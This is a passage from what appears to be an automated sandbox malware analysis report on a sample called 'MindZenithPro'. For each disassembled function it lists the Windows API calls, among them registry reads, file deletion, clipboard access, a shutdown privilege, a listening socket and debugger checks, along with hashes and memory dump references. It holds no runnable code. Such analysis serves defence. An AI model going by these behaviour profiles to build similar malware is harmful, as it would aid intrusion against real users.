                                    • Opcode Fuzzy Hash: 24e73b68e05e9b7ff750724059ba16c48e6904665cc29441f7e862dde8c842ba
                                    • Instruction Fuzzy Hash: 54D122B2508344AFC315EBA4C885EABB7ECAF88704F04491EF585DB291EB74DD44CB62
                                    Function 0043448D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004344AF
                                    • _wcslen.LIBCMT ref: 004344DC
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043450C
                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0043452D
                                    • RemoveDirectoryW.KERNEL32(?), ref: 0043453D
                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 004345C4
                                    • CloseHandle.KERNEL32(00000000), ref: 004345CF
                                    • CloseHandle.KERNEL32(00000000), ref: 004345DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                    • String ID: :$\$\??\%s
                                    • API String ID: 1149970189-3457252023
                                    • Opcode ID: cc9d1013866aea901a79379529d245ac686f97e371387f534e753d79416ffd7e
                                    • Instruction ID: 949fdd6ce0fc751267a56476d3abf33ebee478f13d0e0561c4d3a241bd6b98cc
                                    • Opcode Fuzzy Hash: cc9d1013866aea901a79379529d245ac686f97e371387f534e753d79416ffd7e
                                    • Instruction Fuzzy Hash: 393182B19002197BDB219F60DC49FEB37BCEF88701F1041B6F605D61A1E774D6458B28
                                    Function 0044C5CB Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0044D11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0044BE35,?,?), ref: 0044D13C
                                      • Part of subcall function 0044D11F: _wcslen.LIBCMT ref: 0044D178
                                      • Part of subcall function 0044D11F: _wcslen.LIBCMT ref: 0044D1E6
                                      • Part of subcall function 0044D11F: _wcslen.LIBCMT ref: 0044D21C
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0044C6C5
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0044C730
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0044C754
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0044C7B3
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0044C86E
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0044C8DB
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0044C970
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0044C9C1
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0044CA6A
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0044CB09
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0044CB16
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                    • String ID:
                                    • API String ID: 3102970594-0
                                    • Opcode ID: 1b1c6edf391e87c5b5f083c5e8126ef145df8337ef787ec12344da35bed528f6
                                    • Instruction ID: 6d095d35f06f467ab2913a3a132a509bab496eee6cf7e456aa7513f6e8340d05
                                    • Opcode Fuzzy Hash: 1b1c6edf391e87c5b5f083c5e8126ef145df8337ef787ec12344da35bed528f6
                                    • Instruction Fuzzy Hash: F2025C71605200AFD755CF28C8D1E2ABBE5EF48318F08849DE84ADB2A2D735ED42CB95
                                    Function 0042D65B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003C3FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C3E0E,?,?,00402A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 003C4017
                                      • Part of subcall function 0042E7DA: GetFileAttributesW.KERNEL32(?,0042D57A), ref: 0042E7DB
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0042D707
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0042D7C2
                                    • MoveFileW.KERNEL32(?,?), ref: 0042D7D5
                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 0042D7F2
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0042D81C
                                      • Part of subcall function 0042D881: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0042D801,?,?), ref: 0042D897
                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 0042D838
                                    • FindClose.KERNEL32(00000000), ref: 0042D849
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                    • String ID: \*.*
                                    • API String ID: 1946585618-1173974218
                                    • Opcode ID: 10b8ab4a7571fb6dd0e75d2218028bcbd0ad3c854aabc81b79ebc491d34fc023
                                    • Instruction ID: 78cfc6546b248697de73ff91f6c599f6976711879634086889401f12857d405b
                                    • Opcode Fuzzy Hash: 10b8ab4a7571fb6dd0e75d2218028bcbd0ad3c854aabc81b79ebc491d34fc023
                                    • Instruction Fuzzy Hash: FB616E31D0111D9ACF06FBA0E982EEDB7B5AF14304F60416AE415BB1A2DB34AF09DB65
                                    Function 0043F4F1 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                    • String ID:
                                    • API String ID: 1737998785-0
                                    • Opcode ID: 680999f29687681700bb8d76aa2e9c2c3ebccdcb054d28812519faf9ec2b89c5
                                    • Instruction ID: e4af86eaca4045c09dea7dda11e522b78e3476fef2c6d08f3f41b632d7f59c07
                                    • Opcode Fuzzy Hash: 680999f29687681700bb8d76aa2e9c2c3ebccdcb054d28812519faf9ec2b89c5
                                    • Instruction Fuzzy Hash: 63419F31A04611AFD720DF25D889F167BA4EF48319F14C0AAE4198F763C779EC46CB95
                                    Function 0042EF37 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00421DA5: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00421DEF
                                      • Part of subcall function 00421DA5: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00421E1C
                                      • Part of subcall function 00421DA5: GetLastError.KERNEL32 ref: 00421E2C
                                    • ExitWindowsEx.USER32(?,00000000), ref: 0042EF73
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                    • String ID: $ $@$SeShutdownPrivilege
                                    • API String ID: 2234035333-3163812486
                                    • Opcode ID: 530be414cafab074d3b82c83c6fbc559060b23f37ce21e6afc36f1f764be2ba6
                                    • Instruction ID: 48c10761f1a3df6d46e45a1543ad4b5291da867461ac104dfd86307cdf748fc3
                                    • Opcode Fuzzy Hash: 530be414cafab074d3b82c83c6fbc559060b23f37ce21e6afc36f1f764be2ba6
                                    • Instruction Fuzzy Hash: B101F272B10230BBE7246676BD85BBF725C9B44345F520827FD02E32D2D6289C4092AC
                                    Function 0044198B Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004419FD
                                    • WSAGetLastError.WSOCK32 ref: 00441A0A
                                    • bind.WSOCK32(00000000,?,00000010), ref: 00441A41
                                    • WSAGetLastError.WSOCK32 ref: 00441A4C
                                    • closesocket.WSOCK32(00000000), ref: 00441A7B
                                    • listen.WSOCK32(00000000,00000005), ref: 00441A8A
                                    • WSAGetLastError.WSOCK32 ref: 00441A94
                                    • closesocket.WSOCK32(00000000), ref: 00441AC3
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                    • String ID:
                                    • API String ID: 540024437-0
                                    • Opcode ID: a86b1eb515a049c9205c03d32443b512d489790aa5575dc5833d6a0f423f9970
                                    • Instruction ID: 682e3ade966f1cb9891903635f8cea3783ae2ad9cf39507141fdaf859f1ccbb2
                                    • Opcode Fuzzy Hash: a86b1eb515a049c9205c03d32443b512d489790aa5575dc5833d6a0f423f9970
                                    • Instruction Fuzzy Hash: 4A417371A002509FE720DF28C494B6AB7E5AF46318F188199D8569F3A3C775EC81CBE1
                                    Function 0042D98E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003C3FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C3E0E,?,?,00402A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 003C4017
                                      • Part of subcall function 0042E7DA: GetFileAttributesW.KERNEL32(?,0042D57A), ref: 0042E7DB
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0042DA05
                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 0042DA55
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0042DA66
                                    • FindClose.KERNEL32(00000000), ref: 0042DA7D
                                    • FindClose.KERNEL32(00000000), ref: 0042DA86
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                    • String ID: \*.*
                                    • API String ID: 2649000838-1173974218
                                    • Opcode ID: 34dd66e1c6569c0a783c4b137177c3a3332dfd66763205490af1e947c35cf2fc
                                    • Instruction ID: 9a3b1444c49a693f7d22815ac279e480f300df6f830a5238177bfd2a4931010e
                                    • Opcode Fuzzy Hash: 34dd66e1c6569c0a783c4b137177c3a3332dfd66763205490af1e947c35cf2fc
                                    • Instruction Fuzzy Hash: 5F31A2314083459BC301EB64D885DAFB7E8AE95304F804D6EF4D1D3192DB24DE09CBA7
                                    Function 00433738 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,004046DA,?,?,00000000,00000000), ref: 00433748
                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,004046DA,?,?,00000000,00000000), ref: 0043375F
                                    • LoadResource.KERNEL32(?,00000000,?,?,004046DA,?,?,00000000,00000000,?,?,?,?,?,?,003C5533), ref: 0043376F
                                    • SizeofResource.KERNEL32(?,00000000,?,?,004046DA,?,?,00000000,00000000,?,?,?,?,?,?,003C5533), ref: 00433780
                                    • LockResource.KERNEL32(004046DA,?,?,004046DA,?,?,00000000,00000000,?,?,?,?,?,?,003C5533,?), ref: 0043378F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                    • String ID: SCRIPT
                                    • API String ID: 3051347437-3967369404
                                    • Opcode ID: 4d7db155aed34e7621085c2435361e1e85c21f2dd333434c25cdafd93b62ca70
                                    • Instruction ID: 89bdb1bd77e0f89b7e75339b735c9dfec8e7ae678e9d5dc4ef8d2c3c0a6b2033
                                    • Opcode Fuzzy Hash: 4d7db155aed34e7621085c2435361e1e85c21f2dd333434c25cdafd93b62ca70
                                    • Instruction Fuzzy Hash: CD117CB0600741BFD7318F25DC88F677BB9EFC9B42F2485A9B402D6250DB71D904C625
                                    Function 0043A29A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003CA1D4: _wcslen.LIBCMT ref: 003CA1DE
                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0043A2E7
                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0043A3FA
                                      • Part of subcall function 00433FE3: GetInputState.USER32 ref: 0043403A
                                      • Part of subcall function 00433FE3: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004340D5
                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0043A317
                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0043A3E4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                    • String ID: *.*
                                    • API String ID: 1972594611-438819550
                                    • Opcode ID: e5882cb9817c90b6d3051415d946455e58171137c26bff3f8fcb8895c3245b53
                                    • Instruction ID: 7cbd4b0b3571db3176c056cca73ae84f5d6bc393643003d4ed69f84b6f8e4f3b
                                    • Opcode Fuzzy Hash: e5882cb9817c90b6d3051415d946455e58171137c26bff3f8fcb8895c3245b53
                                    • Instruction Fuzzy Hash: 2A41B031C40209DFCF11DF64C949AEFBBB4EF08314F20405AE845E6291E738AE94CB56
                                    Function 003D9BAD Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003D9DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 003D9DE2
                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 003D9C7E
                                    • GetSysColor.USER32(0000000F), ref: 003D9D53
                                    • SetBkColor.GDI32(?,00000000), ref: 003D9D66
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Color$LongProcWindow
                                    • String ID:
                                    • API String ID: 3131106179-0
                                    • Opcode ID: f690d3100a80c6b8afd2bb35694edf1a02914aab9c196c45a9f903b6760b6166
                                    • Instruction ID: 491fc61c99542c588daac0aba7f06c995446f06c22147228b5059824fa1e70ec
                                    • Opcode Fuzzy Hash: f690d3100a80c6b8afd2bb35694edf1a02914aab9c196c45a9f903b6760b6166
                                    • Instruction Fuzzy Hash: D4A130B2219104FED726AA39BD48FBB356EDF46304F15021BF502C7792CA299D41C27E
                                    Function 004523FC Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                    • String ID:
                                    • API String ID: 292994002-0
                                    • Opcode ID: edd3dfb720023248aebf9a1023cf8d05c45da1b211e159bccc31e6755977b9b5
                                    • Instruction ID: d900cbbbf1fa27027a36aa0935c9d941de43409ca08292ba26e07da8cf96c48d
                                    • Opcode Fuzzy Hash: edd3dfb720023248aebf9a1023cf8d05c45da1b211e159bccc31e6755977b9b5
                                    • Instruction Fuzzy Hash: 8921D0317002105FD7218F2AC844B1B7B94BF97316F08806EE8498B353DBB9DC46CB99
                                    Function 003F28E2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 003F29DA
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 003F29E4
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 003F29F1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID: c,?
                                    • API String ID: 3906539128-981986040
                                    • Opcode ID: bdde84834403870d9fa60b7242633bfa4052e3d7b1e41143b0313d8316760905
                                    • Instruction ID: 0b6ffc29a47b109b8c585227972f3cc9253df9e0cd1a1a7e0c43f504a037e93d
                                    • Opcode Fuzzy Hash: bdde84834403870d9fa60b7242633bfa4052e3d7b1e41143b0313d8316760905
                                    • Instruction Fuzzy Hash: 0431B57590122C9BCB21DF65DD8979DBBB8AF08310F5042EAE41CA72A1EB709F858F45
                                    Function 0043D5B3 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 0043D5F8
                                    • GetLastError.KERNEL32(?,00000000), ref: 0043D659
                                    • SetEvent.KERNEL32(?,?,00000000), ref: 0043D66D
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ErrorEventFileInternetLastRead
                                    • String ID:
                                    • API String ID: 234945975-0
                                    • Opcode ID: 528c000002837297fafc4b5b3ffe05c1f0d0684baf00c6c6216339650cf5e48b
                                    • Instruction ID: df0a8011b0f00756efa4c037c71a14ec32305604acbc46d926863532a6ad5099
                                    • Opcode Fuzzy Hash: 528c000002837297fafc4b5b3ffe05c1f0d0684baf00c6c6216339650cf5e48b
                                    • Instruction Fuzzy Hash: BB21C1B1900704AFD7309F65E849B9BB7F8EF04304F10442BE15AD2251E778EE45CB58
                                    Function 0041E4B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: %.3d$X64
                                    • API String ID: 481472006-1077770165
                                    • Opcode ID: baa38966c8eabc9ba766728a9cd4af5e5c4c9a4bde820f273934b46b09693d02
                                    • Instruction ID: bd350e081f1cfb6f5c4130ac222ed507014cf53ce05b5ea06ca8c8bf14a18b37
                                    • Opcode Fuzzy Hash: baa38966c8eabc9ba766728a9cd4af5e5c4c9a4bde820f273934b46b09693d02
                                    • Instruction Fuzzy Hash: 40D012B9C05119E9CB5097D19C48DF9777CBB08701F648453FC0695101F72CD5C59B27
                                    Function 0041E514 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetUserNameW.ADVAPI32(?,?), ref: 0041E526
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
